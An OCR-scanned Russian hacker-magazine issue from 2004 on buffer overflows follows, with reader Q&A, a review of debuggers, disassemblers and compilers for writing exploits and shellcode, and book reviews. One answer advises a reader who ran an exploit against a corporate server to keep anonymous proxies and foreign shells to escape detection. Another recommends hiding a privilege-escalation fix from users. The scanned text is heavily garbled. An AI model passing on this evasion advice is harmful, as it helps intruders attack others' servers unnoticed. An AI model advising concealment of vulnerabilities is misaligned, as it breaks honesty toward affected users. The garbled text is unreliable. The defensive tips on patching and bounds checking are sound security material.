ного (подробнее - в ма- 


териалах этого номера). 


Я написал shell-Kog, 
© но меня смущает его 
размер. Как мне его 
уменьшить? 


Если shell-kog запуска- 
ет /bin/sh, то не стоит 
изобретать велосипед. 
Возьми уже готовый 
код из списка часто ис- 
пользуемых 

( 

). Когда зада- 
ча сводится лишь к оп- 
тимизации размера, ре- 
комендую собственную 
АР!-среду для написа- 
ния удобных shell-Ko- 
дов. Бери ее по адресу 


. Кстати, этой 
удобной штуковиной и 
эксплоиты можно пи- 
сать :). Если же ты не 
хочешь целиком пере- 
писывать свое детище, 
то тебе стоит восполь- 
зоваться сжатием бина 
каким-нибудь прими- 
тивным методом. UPX в 
shell-Kkoge? Звучит кра- 
сиво. 


СОВЕТЫ ХАКЕРУ 


Реально ли найти пе- 
реполнение в мобиль- 
нике? 


Переполнения буфера 
в мобильных телефо- 
нах еще не обрели осо- 
бой популярности в ми- 
ре хакеров, хотя мо- 
бильник представляет 
собой контроллер с 
прошивкой. Если ты 
знаешь ассемблер, ка- 
чай новую версию 
софта для сотового 
друга, дизассемблируй 
его и тренируйся на 
эмуляторах :). Уже сей- 
час некоторые аппара- 
ты можно вывести из 
строя SMS с неподдер- 
живаемыми символами. 


© Какой софт для поис- 
ка переполнений яв- 
ляется лучшим? 


Из списка программ, 
анализирующих сост, 
мне больше всего пон- 
равилась squirtv 

( 


Софтина не только 
анализирует исходник 
на переменные с фик- 
сированным буфером, 
но и умеет добиваться 
(методом жесткого 
брутфорса) заданного 
адреса возврата и заг- 
ружать указанный 
shell-kog. Прога напи- 
сана на перле и, как 
следствие, может рабо- 
тать nog Windows. В 
комплекте со скриптом 
идет подробный ману- 
ал, прочитав который, 
ты узнаешь все воз- 
можности Squirtv. 


© У меня задумка: хочу 
написать оригиналь- 


ный Shell-Kog к своему 
эксплоиту. Я отлично знаю 
Си, но не владею ассемб- 
лером. Что мне делать? 


Для таких случаев су- 
ществует программа 
shellforge ( 


). Прин- 
цип работы с ней очень 
прост: ты пишешь 
shell-Kog полностью на 
Сии запускаешь shell- 
forge со своим исход- 
ником в качестве пара- 
метра. Питошный сце- 
нарий, немного поду- 
MaB, выплюнет тебе го- 
товый shell-Kog. 


(2) Я тут скачал неплохой 
эксплоит, переполня- 
ющий буфер у демона. За- 
юзал его на корпоративном 
сервере, но результат был 
нулевой. Смогут ли админы 
пресечь мою не совсем за- 
конную деятельность? 


Конечно, смогут. Хотя 
это зависит от ситуа- 
ции. Все приложения 
оставляют записи в ло- 
гах при возникновении 
нестандартных ситуа- 
ций. Например, старый 
добрый x2 от sshd имел 
побочный эффект: де- 
мон сорил в журнал 
строкой sshd[29182]: 
fatal: Local: Corrupted 
check bytes on input. 
Если сервис, который 
ты атаковал, работает 
через syslog, то, скорее 
всего, бдительный ад- 
мин узнает о твоих про- 
делках. На этот случай 
всегда имей несколько 
анонимных проксиков и 
забугорных shell’oB :). 


ВОПРОСЫ 
ПРОГРАММИСТА 


© Я никогда не выкла- 
дывал исходники 
своей популярной прог- 
раммы. Велика ли вероят- 
ность того, что хакеры 
найдут багу в моем проек- 
те и переполнят буфер? 


Вероятность очень 
большая. Существуют 
утилиты, позволяющие 
компрометировать на 
переполнение даже 
бинарные файлы. Если 
твоя софтина юзается 
в качестве пользова- 
тельского приложения, 
можешь особо не вол- 
новаться. Когда же 
прога запускается под 
рутом (администрато- 
ром) и требует допол- 
нительных привилегий, 
следует тщательно 
проверять сост на 
всевозможные пере- 
полнения. 


Пишу софт под 

MacOS. Весь инет пе- 
рерыл, но так и не смог 
найти хороший отладчик 
для моих программ. Поре- 
комендуйте хороший де- 
баггер для этой операци- 
онки. 


Посоветовавшись с 
Арр!е-программерами и 
поискав в инете, я сде- 
лал выбор в пользу 
прекрасного дизассе- 
мблера MacsBug. Заг- 
ляни на страницу 


и 
узнаешь все об этом 
чудесном приложении. 
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© Каким основным 
принципам должен 

следовать начинающий 

программист? 


Написание защищен- 
ных программ - основ- 
ной принцип и самая 
сложная задача для 
программиста. Это в 
особенности относится 
к кодингу серверов, 
программ по безопас- 
ности и тулз, запускаю- 
щихся под рутом и дру- 
гими системными акка- 
унтами. Используй про- 
верку границ (функции 
strn*, sn* вместо sprintf 
ит.п.), динамическое за- 
дание размера буфера 
в зависимости от поль- 
зовательского ввода. 
Будь осторожен с цик- 
лами for/while и други- 
ми, которые накаплива- 
ют данные в буфере, и 
всегда обрабатывай 
пользовательский ввод 
с большим вниманием. 
Также в индустрии бе- 
зопасности были npegn- 
риняты значительные 
усилия для предотвра- 
щения проблем пере- 
полнения буфера с по- 
мощью методик типа 
неисполняемый стек, 
suid wrapper, защитные 
программы, которые 
проверяют адреса возв- 
рата, компиляторы с 
проверкой границ и т.д. 
Используй эти техники 
везде, где возможно, но 
не полагайся только на 
них, а придумывай что- 
то свое. 


Решил выпускать 
© программу вместе с 
кодом, но мне сказали, что 
это не совсем безопасно - 
могут найти уязвимость и 
написать эксплоит. Что по- 
советуете? 


Уязвимость могут найти 
и без исходников. Если 
решил дарить миру ис- 
ходники - дари, но будь 
готов ко всему. Прежде 
чем распространять 
сырцы, проверь их все- 
возможными утилитами 
на наличие уязвимых 
мест. И попроси прове- 
рить других программе- 
ров - одна голова хоро- 
шо, а две лучше. 
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2) Получил письмо от 

пользователя, юзаю- 
щего мою программу. Он 
пишет, что обнаружил пе- 
реполнение в моем проек- 
те, ведущее к поднятию go- 
полнительных привилегий. 
Что лучше всего сделать в 
этом случае? 


Тебе повезло, что юзер 
отписал тебе, а не в багт- 
рак. По данным письма 
быстренько пофикси баг 
и выпусти свежий релиз. 
Постарайся не упоми- 
нать, что в старой версии 
наблюдался разруши- 
тельная уязвимость, ина- 
че усугубишь ситуацию. 
Дождись, когда все ап- 
дейтнут прогу, и только 
после этого (через пару 
версий) заяви о пофик- 
сенном изьяне. И не за- 
будь поблагодарить на- 
шедшего уязвимость :). 


© Есть ли альтернатива 

gcc, которая позво- 
лила бы избежать перепол- 
нений? 


Про хорошие альтерна- 
тивы не слышал, однако 
существуют патчи к дсс, 
решающие проблему. 
Сходи по ссылке 


и най- 
дешь ряд фиксов, защи- 
щающих от оверлоада. 
Принцип их действия 
очень прост: при компи- 


ляции к каждой прог- 
рамме добавляется 
участок кода для защи- 
ты от переполнения. 
Патч универсален и мо- 
жет применяться как 
gna Linux, так и для 
FreeBSD. 


ВОПРОСЫ ЮЗЕРА 


© Я не нашел нового 
дистрибутива, поэто- 
му поставил старенький 
Ипих. Сразу же закрыл 
фаерволом порты, чтобы 
никто меня не сломал. Og- 
нако через несколько дней 
обнаружилось, что система 
заражена руткитом. Как та- 
кое могло произойти? 


Активный фаервол не 
защищает от перепол- 
нений на 100%. Взлом- 
щик мог проанализи- 
ровать твои правила и 
найти в них дырку. К 
тому же, хакер спосо- 
бен проэксплуатиро- 
вать старый сервис 
(например, sshd, www, 
ftpd), благо Ha старом 
дистрибутиве Bo всех 
демонах есть ошибки. 
Причин может быть 
много рой логи и ищи 
аномальные записи. 
Затем сноси старый 
пингвин и ставь обнов- 
ленный релиз. 


Я постоянно читаю 

рассылки и в курсе 
недавних уязвимостей. Но 
в моих логах периодически 
появляются странные за- 
писи о выходах по 11 сигна- 
лу веб-сервера. Меня 
взломали? 


Тебя пока еще не взло- 
мали, а вот за твой сер- 
вер отвечать не могу :). 
К сожалению, крупные 
уязвимости всплывают 
не сразу, и ты можешь 
даже не подозревать 
об их существовании. 
Выход по 11 сигналу су- 
лит переполнение бу- 
фера в веб-сервере. 
Поэтому быстро выру- 
бай сервак и обновляй 
его версию. Также пои- 
щи информацию о по- 
добной проблеме в Гуг- 
ле - возможно, не ты 
один столкнулся с та- 
кой аномалией. Впро- 
чем, если логи показы- 
вают ошибки демонов, 
это еще не значит, что 
тебя поломали. Воз- 


можно, хакер просто 
сканирует тебя продви- 
нутой тулзой, пытаясь 
найти уязвимость в 
сервисе etc. 


СОВЕТЫ ЮЗЕРУ 


© Существуют ли специ- 
альные патчи, спаса- 

ющие от локального пере- 

полнения буфера? 


Да, такие патчи суще- 
ствуют. Вот список са- 
мых достойных: 

®. f 
Патч gna Linux, позво- 
ляющий блокировать 
попытки несанкциони- 
рованного доступа, та- 
кие, как кривые обра- 
щения к симлинкам, пе- 
реполнения стека и т.п. 
©. 

. Проект libpara- 
noia позволяет заме- 
нить стандартные баж- 
ные функции на более 
защищенные. Благода- 
ря этому хакер не смо- 
жет переполнить бу- 
фер в локальном при- 
ложении. 

9. 

позво- 
ляет блокировать за- 
пуск зВе!-кода в стеке 
или куче после пере- 
полнения буфера. Ис- 
пользуется только с 
ядрами 2.4.х. 
oO. 


(Exec-shield). 
Вкусные патчи, ориен- 
тированные на блоки- 
рование переполнения. 
©. Grsecurity. Защища- 
етот множеств перепол- 
нений памяти и стека. 


о А как быть с удален- 

ным переполнением? 
Существуют ли средства 
для пресечения хакерских 
атак? 


Во-первых, поставь хо- 
роший саервол. Ho 
брандмауэр не сможет 
в полной мере защи- 
тить твою систему. По- 
этому найди для себя 
оптимальную програм- 
му, анализирующую 
сетевой трафик. Это 
может быть и LIDS, и 
Snort, прекрасно пони- 
мающий нездоровые 
пакеты. Кстати, некото- 
рые админы до сих пор 
доверяют таким утили- 
там, как portcentry и 
logcentry. 


Kak защитить свой 
МИпдо\м$-сервер от 
переполнений? 


Во-первых, выруби все 
левые сервисы. Даже 
если в них найдут пе- 
реполнения, ты не 
пострадаешь. Во-вто- 
рых, обнови привилеги- 
рованные приложения 
go последней версии 
(Microsoft всегда вык- 
ладывает свежие рели- 
зы служб). В-третьих, 
подпишись на рассыл- 
ки, чтобы знать о HO- 
вых переполнениях. И, 
наконец, ежедневно 
изучай подозритель- 
ные записи в логах - 
именно они сигнализи- 
руют о возможных по- 
пытках сорвать крышу 
у твоей Винды. 


(2) В последнее время 
моя система стала ра- 

ботать нестабильно. Каж- 
дый час (а то и чаще) по- 
является окошко с Hag- 
писью «Служба Isass за- 
вершена аварийно, и сис- 
тема будет перезагруже- 
на». Что делать и кто ви- 
новат? 


Уже давно известен 
баг в библиотеке ASN.1 
(кстати, почитай статью 
«Десятка самых-самых. 
Обзор хитовых пере- 
полнений» и ознакомь- 
ся с принципом бага), 
позволяющий валить 
виндовый сервис и ис- 
полнять произвольный 
код. Вот хакеры и пыта- 
ются переполнить бу- 
фер у твоих форточек, 
причем делают это go- 
вольно успешно. Для 
решения проблемы не- 
медленно топай на 
microsoft.com и выка- 
чивай патч. Не забудь 
также прикрыть 135- 
139 порты фаерволом. 
Должно помочь. 


Bese 
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ИНСТРУМЕНТЫ МАСТЕРА ) 


Николай «GorluM» Андреев (gorlum@real.xakep.ru) 


ИНСТРУМЕНТЫ 
МАСТЕРА 


ОБЗОР СОФТА ДЛЯ СОЗДАНИЯ ЭКСПЛОИТОВ 


ЧТО ТРЕБУЕТСЯ? 


и Представим, что мы 


нашли баг на перепол- 


Сейчас 
Soft-Ice 
продается в 
составе 
Numega 
Driver 
Studio 3a 
круглень- 
кую сумму. 


нение в каком-нибудь 
софте и просто горим 
желанием его использовать (а впослед- 
ствии сообщить о нем производителю), 
причем не как банальный DoS, a как 
способ получения доступа к машине с 
таким софтом. Для этого потребуется 
написать эксплоит под наш баг, кото- 
рый бы открывал командный Shell на 
каком-нибудь порту. Процесс написа- 
ния эксплоита я делю на три этапа, свя- 
занных с использованием разных 
инструментов. 


Первый этап - сбор данных об уязви- 
мости: поиск функции, в которой проис- 
ходит переполнение, запись адреса 
возврата этой функции, размера бусфе- 
ра и кучи других необходимых вещей 
(подробнее о которых ты сможешь про- 
честь в других материалах этого номе- 
ра). Для этих действий нам потребуются 
утилиты двух видов: отладчики и дизас- 
семблеры. С помощью дизассемблеров 
очень легко ориентироваться в коде 
уязвимой программы, а отладчик (деба- 
гер) будет ключом к данным, возникаю- 
щим в ходе работы приложения, - воз- 
можность просмотреть стек в момент 
переполнения меня всегда очень радо- 
вала. 

Второй этап - написание $Пе!-кода, 
голого куска программы, который бы 
открывал доступ к компьютеру жертвы. 
Это самая ответственная и сложная, на 
мой взгляд, часть процесса. Здесь нам 
понадобится ассемблер, ведь только с 
его помощью можно создать работаю- 
щий, отвечающий всем хитрым требо- 
ваниям код. 

Третий этап - собственно написание 
эксплоита, программы, которая бы реа- 
лизовала переполнение: засунула бы в 
буфер shell-kog и сразу же им восполь- 
зовалась. Тут никак не обойтись без хо- 
рошего компилятора Си, на котором 
проще и удобнее написать вкусный 
код. 


Остается только выбрать из ассорти- 
мента доступных в сети инструментов 
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те, которые бы лучше всего подходили 
для достижения нашей цели - приго- 
товления хакерского overflow-pary. Ка- 
MOH! 


ОТЛАДЧИКИ И ДИЗАССЕМБЛЕРЫ 


Soft-Ice 
http://www.numega.com 


DITORS' 
_ CCHOIGE 


и Думаю, He стоит гово- 
рить, что на сегодняшний 
день это лучший из goc- 
тупных смертному отлад- 
чиков. Располагаясь в ringO, он может 
сделать все, что ты пожелаешь. При 
работе с ним можно не ограничивать 
себя отладкой пользовательских при- 
ложений, никто не помешает тебе хоть 
все ядро перелопатить (на уровне кото- 
рого, кстати, и сидит 5оЁ-!се). Пользо- 
ваться таким отладчиком - одно удо- 
вольствие. Взять, например, наш слу- 
чай - написание эксплоита: подгрузи к 
Soft-Ice winsock, поставь брекпоинт на 
функцию гесу (командой bpx) и знай 
себе жди, когда брек сработает. Когда 
это произойдет, останется только поко- 
выряться в аккуратненьких строчках 
дизассемблированной программки и 
посмотреть, нет ли тут чего-нибудь, что 
можно переполнить. Удобнее, ИМХО, 
еще не придумали. 


Soft-lce не даст пропасть 


Ida Pro 
http://www.idapro.com 
m= Дизассемблер номер 
один в мире. Никакому дру- 
гому еще не удалось пе- 
реплюнуть его по функци- 
ональности. Сам распознает локаль- 


ные переменные (если есть массив 
символов, то он так и напишет, а не 
будет морочить голову) и вызовы API, 
и сам рисует комментарии к коду. А 
чего только стоит одна возможность 
написания к IDA Pro дополнительных 
модулей! К примеру, уже сейчас су- 
ществуют модули для дизассемблиро- 
вания файлов, сжатых UPX'om. Внут- 
ренний язык IDA хорошо документи- 
рован, и если ты раньше писал на Си, 
то у тебя не должно возникнуть труд- 
ностей с созданием собственных 
функций для этого замечательного 
дизассемблера. 

Есть отличная идея: написать для РА 
Рго модуль, который будет искать в ди- 
зассемблируемой программе переполне- 
ние буфера и выдавать о нем всю инфор- 
мацию (положение буфера, адреса возв- 
рата). Кто возьмется - пишите мне, помогу 
если не советом, то добрым словом! 


ae Se SS ЗЕЕ ТВ 


IDA - самый мощный дизассемблер 


W32Dasm 

m= А это мой любимый дизассемблер. 
Хоть у меня на винте валяется и IDA, и 
Sourcer, и куча других подобных 
инструментов, предпочтение я отдаю 
именно WDasm. Проверенный време- 
нем, это второй по популярности дизас- 
семблер после IDA (но, к сожалению, не 
второй по функциональности). Многим 
он нравится из-за удобного способа на- 
вигации по коду с помощью клавиш 
up\down\left\right и Windows-untepqen- 
са. Мне же он приглянулся тем, что 
всегда показывал, где и какая тексто- 
вая строка была использована, пусть 
даже она располагалась в ресурсах. 

Также в WDasm имеется встроенный 
отладчик уровня приложения, который 
хоть и не может составить конкурен- 


Kernel Debugger 
http://msdn.microsoft.com 
Мощный отладчик уровня ядра, 
входящий в пакет разработки драйве- 
ров ядра DDK (Device Driver Kit). До 
появления в сети исходников Windows 
единственным источником информа- 
ции о внутренних структурах ядра 
служил как раз этот отладчик. Именно 


ры. Профессионалы говорят, что 
Kernel Debugger плавно догоняет по 
функциональности Soft-Ice. Hy а при 
анализе дампа памяти ему вообще нет 
равных. 

Кстати, в отличие от продукта Митеда 
этот отладчик бесплатен. Его можно 
свободно скачать с сайта Microsoft из 
раздела для разработчиков. 


= этим инструментом пользуется знаме- 


WDasm рано списывать со счетов нитый Свен Шрайбер в своей книге 


"Недокументированные возможности 
цию таким монстрам, Kak Soft-Ice или Windows 2000", с помощью него OH 
КО, но иногда бывает полезен. 


отлаживает свои хитроумные драйве- 


ЕСЛИ НЕТ АССЕМБЛЕРА ПОД РУКОЙ 
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Интерфейс KD оставляет желать лучшего 


КОМПИЛЯТОРЫ АССЕМБЛЕРА 


FASM 
http://flatassembler.net/ Е . 
~ нутреннии 
Плоский ассемблер (Flat РАЕН 
Assembler) - недавно поя- хорошо go- 
вившийся, но уже завое- LAUREL 
= ван, и если 
вавший широкую популяр- ты раньше 
ность компилятор. Переносимость писал на 
$ 6 in32 Си, то у те- 
(FASM работает nog Win32, Dos и бя не долж- 
Linux), быстрота, компактность дистри- но возник- 
= нуть труд- 
бутива и постоянное развитие проекта Нота 
вот что сделало возможным такую по- созданием 
ложительную реакцию на него кодеров. а: 
Меня же очаровали в этом ассембле- ций для 
ре не мощный и удобный язык макро- этого заме- 
а чательного 
сов и не поддержка всех самых совре дизассемб- 


менных инструкций процессоров, а спо- лера. 
соб оформления исходника - нужно 
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Среда ЕАЗМ'а 


win32 shellcode constructor by zOmbie 
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ИНСТРУМЕНТЫ МАСТЕРА ) 


описывать каждую секцию твоего буду- 
щего РЕ-файла. Почему-то мне показа- 
лось это невероятно удобным. 

Переносимость этого ассемблера поз- 
воляет не прыгать к другому компиля- 
тору (и не вспоминать его синтаксис и 
хитрые особенности) сразу же, как 
только появилась необходимость напи- 
сать Shell-kog под *nix. А к миленькому 
редактору, находящемуся в дистрибу- 
тиве, с подсветкой кода очень быстро 
привыкаешь. 


MASM32 
http://www.movsd.com/ 

ш Если сложить вместе ASM-komnuna- 
тор и линкер от Microsoft, тучу библио- 
тек и заголовочных файлов, учебник по 
программированию на ассемблере 
Iczelion’a и целый ряд разных утилит, 
так или иначе облегчающих жизнь ко- 
gepy, то мы получим пакет MASM32, 
адаптированный к современному миру 
старый добрый Macro Assembler. 

Пакет определенно хорош. Он не так 
удобен при написании shell-kogos, как 
FASM, но некоторые используют его в 
паре с Visual C++. 


бом формате. В мануале сказано, что 
он может создавать файлы следующих 
форматов: ELF (формат Линукса), 
NetBSD/FreeBSD, COFF, Microsoft 16-bit 
OBJ и Win32 - симпатичный списочек, 
особенно в нем хорошо смотрятся BSD. 
Вот только изменение синтаксиса все 
портит. Он, конечно, похож Ha Intel’oBc- 
кий, но с ним придется разбираться - а 
это жирный кусок времени для чтения 
мануалов. 


TASM 
http://www.borland.com 

= Borland Turbo Assembler. Если 3an- 
ти на страничку какого-нибудь вирмей- 
керского журнала (например, на 
29a.host.sk), то сразу можно заметить, 
что все выкладываемые там исходники 
написаны в меньшинстве случаев для 
MASM32 и для ТАЗМ - в большинстве. 
Не знаю, чем так приглянулся этот ас- 
семблер ребятам, пишущим вирусы. 
Возможно, именно под него они начина- 
ли писать вири nog DOS, а, когда Билли 
выпустил Винду, не захотели перехо- 
дить на что-нибудь другое (альтернати- 
вой был только MASM). В целом, очень 


неплохой компилятор, староват, правда. 
Он умеет понимать синтаксис MASM, 
включая его макроопределения, и этой 
возможностью активно пользуется 
большая часть АЗМ-кодеров, работаю- 
щих с ТАЗМ. Хотя во всех книгах пишут 
о достоинствах его собственного син- 
таксиса Ideal. 


УС++ 
http://www.microsoft.com 

ш Если кто и возьмется писать экспло- 
ит под Windows, то он это будет делать 
только в Visual С++. Почему? Во-пер- 
вых, потому что у мелкомягких лучший 
оптимизатор кода - ехе’шник получает- 
ся минимального размера. Во-вторых, 
Визуальная Студия (Visual Studio), в 
состав которой входит С++, обладает 
очень хорошей средой разработки с 
приличным отладчиком. Подсветка кода, 
всплывающие окошки с прототипами 
АР|-функций - все это благоприятно 
действует на кодера. В-третьих, потому 
что ничего другого под рукой нету, а 
“Builder масдай форева". 


NASM 
http://sourceforge.net/projects/nasm 


ш Очередной sourceforge проект. Ha 
этот раз не плоский, а Ме мае. Мощ- 
ный модульный х86 ассемблер с пере- 
лопаченным синтаксисом, переносимый 
на любые оси и компилящий код в лю- 
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Сплэш-скрин Студии 


Подсветка кода, всплывающие 
окошки с прототипами API- 
функций - все это благоприятно 
действует на кодера. 


Жалко, что скачать Студию из интернета будет затрудни- 
тельно, в отличие, например, от Icc, ее дистрибутив на дискету 
не влезет. А если с М5О№' ом, то и Ha DVD не влезет :). 


Borland C++ Builder 
http://www.borland.com 

м Delphi c синтаксисом C++. Такие же компоненты, такая же 
среда. Кошмар. ВСВ выплевывает относительно неплохой 
код, если не использовать VCL. А если использовать, то даже 
минимальное приложение с трудом на дискету влезет - хоро- 
шенький эксплоит получится, не так ли? Без фирменной биб- 
лиотеки классов C++ Builder подойдет разве что ярым против- 
никам Microsoft, которые не пользуются Visual Studio по pe- 
лигиозным соображениям. А зря. 


Gcc 
http://gcc.gnu.org 

и Под никсами нас ждет увлекательное 
погружение в мир GNU и общение с живы- 
ми представителями вида opensource. Надо 
попробовать натравить какую-нибудь 
программу для поиска переполнений в ис- 
ходниках на gnu с compiler; думаю, будет 
много смеха. 

Если в сети вдруг выкладываются сырцы 
какого-нибудь эксплоита, то они почти наверняка будут для 
GCC (как исключение - проект для VS). Главный плюс этого 
компилятора в том, что он есть на любой тачке с установлен- 
ной *пх-системой и даже на некоторых тачках с Windows. Я, 
кстати, для компиляции никсовых эксплоитов в ффорточках ис- 
пользую ССС из cygwin'a, и вам советую. 


Антилопа СМУ 
тут как тут 


вдогонку 

и Помимо всех вышеперечисленных мной инструментов мо- 
жет пригодиться также Пех-редактор. Наплодилось их сейчас 
великое множество. Кто-то предпочитает HIEW, Крис Kacne- 
рски пользуется QVIEW, а я вот HEX Workshop юзаю и ни в 
чем себе не отказываю. Друг от друга эти редакторы отлича- 
ются не сильно, поэтому выбирай любой - не прогадаешь. 


Используй тот сост, который тебе нравится. Пробуй, ставь, 
удаляй и остановись на том, который окажется для тебя са- 
мым удобным. Весь сосрт, описанный в статье, ты сможешь 
найти на диске, который прилагается к журналу. Засим кланя- 
юсь, удачных тебе переполнений! 
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ОБЗОР КНИГ ПО ПРОГРАММИРОВАНИЮ, ВЗЛОМУ И ЗАЩИТЕ 


САМОУЧИТЕЛЬ С++ 


Разумная цена: 145 рублей 


Наиболее удобное ру- 

ководство для самос- 
тоятельного изучения С++ в 
соответствии с требования- 
ми нового стандарта. Книга 
состоит из коротких, но тща- 
тельно продуманных уроков. 
Урок начинается с описания 
определенного программно- 
го принципа, который иллю- 
стрируется далее примером 
("принцип в действии"), в 
конце приводятся упражне- 
ния для закрепления изу- 
ченного материала. Содер- 
жание каждого нового урока 
строится на основе уже 
пройденных, что облегчает 
восприятие материала и ус- 
коряет процесс обучения 
программированию на С++. 


ASSEMBLER: УЧЕБНИК 
ДЛЯ ВУЗОВ 


Книга посвящена 
вопросам программи- 


ХАКЕРСПЕЦ | 08(45) | 2004 


Разумная цена: 144 рубля 


рования на языке ассемб- 
лера для компьютеров на 
базе микропроцессоров 
фирмы Intel (описание ко- 
мана для |п{е|-совестимых 
процессоров go Pentium 4 
включительно). Интересна 
будет в первую очередь 
тем, кто профессионально 
занимается системным прог- 
раммированием. Так как 
этот курс читается автором 
в одном из вузов, методика 
изложения материала - лек- 
ционная. Кроме того, автор 
особо заостряет внимание 
на тех вопросах, которые 
обычно вызывают труднос- 
ти у студентов. Здесь ты 
найдешь информацию по 
архитектуре микропроцес- 
соров Intel, средствам acce- 
мблера для работы co 
структурами данных, мак- 
росредствам языка, органи- 
зации модульного програм- 
мирования, разработке 
оконных приложений, прог- 
раммированию математи- 
ческого сопроцессора, ис- 
пользованию ММХ-расши- 
рения микропроцессоров 
Pentium и многое другое. 


ASSEMBLER: 
ПРАКТИКУМ 


Разумная цена: 110 рублей 


Масса практического 

материала для созда- 
ния сложных программ на 
языке ассемблера. Приведе- 
ны варианты ассемблерной 
реализации многих извест- 
ных и востребованных на 
практике алгоритмов. Изло- 
жение базовых вопросов 
прикладного программиро- 
вания сопровождается рас- 
смотрением интересных 
практических задач. Ариф- 
метика чисел любой разряд- 
ности, генерация псевдослу- 
чайных последовательнос- 
тей, сложные структуры дан- 
ных, работа с хэш-таблица- 
ми, сортировка и поиск, ос- 
новы компиляции, рекурсия 
и рекурсивные алгоритмы, 
разработка библиотек DLL, 
работа с консолью, работа с 
файлами, алгоритмы преоб- 
разования чисел, оценка 
эффективности ассемблер- 
ного кода, вычисление конт- 
рольных сумм и многое дру- 
гое - книга стоит того, чтобы 
быть в твоей библиотеке. 


ЯЗЫК 
ПРОГРАММИРОВАНИЯ 
С++. ЛЕКЦИИ И 
УПРАЖНЕНИЯ: УЧЕБНИК 


Разумная цена: 204 рубля 


Содержание книги не 

привязано ни к какой 
конкретной реализации С++ 
и охватывает обширный 
круг вопросов, необходи- 
мых для создания полно- 
ценных программ на С++, - 
от знакомства с основами 
синтаксиса языка gO много- 
численных новых функцио- 
нальных возможностей С++ 
(классы, объекты, наследо- 
вание, полиморфизм, вирту- 
альные функции, стандарт- 
ная библиотека шаблонов 
STL, ВТТ и т.п.). Отличитель- 
ные особенности книги - 
структурированное изложе- 
ние материала и изобилие 
практических примеров. 
Для начинающих книга пос- 
лужит отличным учебником, 
а для профи - наглядным 
справочником, облегчаю- 
щим ежедневный труд. 


ЯЗЫК 
ПРОГРАММИРОВАНИЯ СИ 


Разумная цена: 135 рублей 


Когда необходимо 

срочно подглядеть в 
какие-либо справочные ма- 
териалы по С или С++, как 
назло под рукой не оказы- 
вается ничего дельного. Хо- 
рошо, если доступен интер- 
нет - там подобной инфор- 
мации навалом. А если нет? 
Не таскать же с собой ог- 
ромные справочники. Эта 
небольшая книжка решит 
проблему. В ней нет ничего 
лишнего - только основные 
данные: обзор синтаксиса 
языка, типы, операторы, пе- 
ременные и выражения, 
циклы управления, функ- 
ции и структура программы, 
указатели и массивы, струк- 
туры, ввод и вывод, интер- 
фейс с УМХ, а также нес- 
колько полезных приложе- 
ний. 


ЯЗЫК 
ПРОГРАММИРОВАНИЯ 
С++. СПЕЦИАЛЬНОЕ 
ИЗДАНИЕ 


Книга от автора язы- 

ка программирования 
С++, с подробным описани- 
ем возможностей и эффек- 
тивных подходов к реше- 
нию разнообразных задач 
проектирования и програм- 
мирования. В ней содержит- 
ся множество практических 
примеров, демонстрирую- 
щих современный объект- 
но-ориентированный под- 


Страуструп Б. 


Разумная цена: 348 рублей 


ход к созданию програм- 
мных продуктов и хороший 
стиль программирования на 
С++. Это - специальное из- 
дание, более адаптирован- 
ное для начинающих прог- 
раммистов. Отдельно рас- 
смотрены нововведения 
языка: стандартная библио- 
тека шаблонов (STL), прост- 
ранства имен (namespaces), 
механизм идентификации 
типов во время выполнения 
(РТТ, явные приведения 
типов (саз{-операторы) и 
многое другое. 


ПРОГРАММИРОВАНИЕ 


НА ЯЗЫКЕ АССЕМБЛЕРА 
IBM PC 


Разумная цена: 93 рубля 


Если ты учишься на 
факультете вычисли- 
тельной математики и ки- 


бернетике МГУ им. М.В. Ло- 
моносова, покупай не раз- 
думывая - можно будет не 
посещать лекции курса 
"Архитектура ЭВМ и язык 
ассемблера" :). Для всех ос- 
тальных книга послужит 
неплохим справочником по 
MASM 4.0. В книге в основ- 
ном рассматриваются об- 
щие приемы программиро- 
вания, и мало внимания 
уделено вопросам управле- 
ния различными устрой- 
ствами ПК при помощи ас- 
семблера. По мнению авто- 
ра, будет проще перейти от 
общего к частному, а не на- 
оборот. 


ASSEMBLER. 
СПЕЦИАЛЬНЫЙ 
СПРАВОЧНИК 


Юров В.И. 


Разумная цена: 144 рубля 


Справочный материал 

по языку ассемблера 
для процессоров Intel (опи- 
сание системы команд go 
Pentium 4 включительно). 
Включены необходимые 
сведения по процессорам 
32-разрядной архитектуры 
Intel (IA-32) и версиям паке- 
тов TASM и MASM. Книга 
пригодится и при програм- 
мировании процессоров, 
поддерживающих базовые 
элементы |A-32 (процессо- 
ры фирм AMD, VIA, 
Transmeta). Книга написана 
профессиональным прог- 
раммистом и преподавате- 
лем, читается легко и прек- 
расно проиллюстрирована 
примерами. 


Ш Огромное спасибо букинистическому интернет-магазину "О$-Книга", ко- 


торый любезно предоставил нам все эти книжки. При желании ты сможешь 
приобрести их по разумным ценам на сайте этого магазина Www.osbook.ru. 


НАЧАЛЬНЫЙ КУРС СИ 
С++ 


Березин Б.И. 


Разумная цена: 88 рублей 


Пособие для "самых 

маленьких". Книга не 
претендует на изложение 
всех нюансов языка С++, но 
позволяет постичь основы 
программирования на С. 
Ценность книги заключает- 
ся в том, что она написана 
на основе учебного курса 
"С++ для начинающих", ко- 
торый читается на протяже- 
нии нескольких лет в учеб- 
ном центре "Диалог-МИ- 
ФИ". То есть материал дав- 
но обкатан на других нович- 
ках и представляет собой 
универсальный инструмент 
для самообучения. Прикинь, 
сколько стоили бы тебе 
курсы, а за книжку ты зап- 
латишь меньше сотни. 


ЗАЩИЩЕННЫЙ КОД 


Е 


Ховард М. 


Разумная цена: 383 рубля 


Книга для разработ- 
чиков собственного 
ПО. Практические советы и у 
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ПОЛЕЗНАЯ БУМАГА ) 


рекомендации по защите 
разрабатываемых приложе- 
ний на всех этапах: от про- 
ектирования до тестирова- 
ния по выявлению брешей 
в готовой программе и соз- 
дания безопасной докумен- 
тации. Из книги ты узнаешь, 
как моделировать опаснос- 
ти и какие методы защиты 
наиболее эффективны. 
Рассмотрены основные 
принципы безопасного ко- 
дирования: переполнение 
буфера, выбор механизма 
управления доступом, прин- 
цип минимальных привиле- 
гий, подводные камни крип- 
тографии, защита секрет- 
ных данных, недостатки ка- 
нонического представле- 
ния, проблемы БД и многое 
другое. Кроме общих мето- 
дов обеспечения защиты, 
уделено особое внимание 
сетевой безопасности при 
разработке сетевых прило- 
жений. 


ПЕРСОНАЛЬНАЯ ЗАЩИТА 
ОТ ХАКЕРОВ. 
РУКОВОДСТВО ДЛЯ 
НАЧИНАЮЩИХ 


Джерри Ли Форд 


Разумная цена: 105 рублей 


Название уже подра- 

зумевает, что содер- 
жание книги касается обес- 
печения безопасности сво- 
ей персоналки дома при 
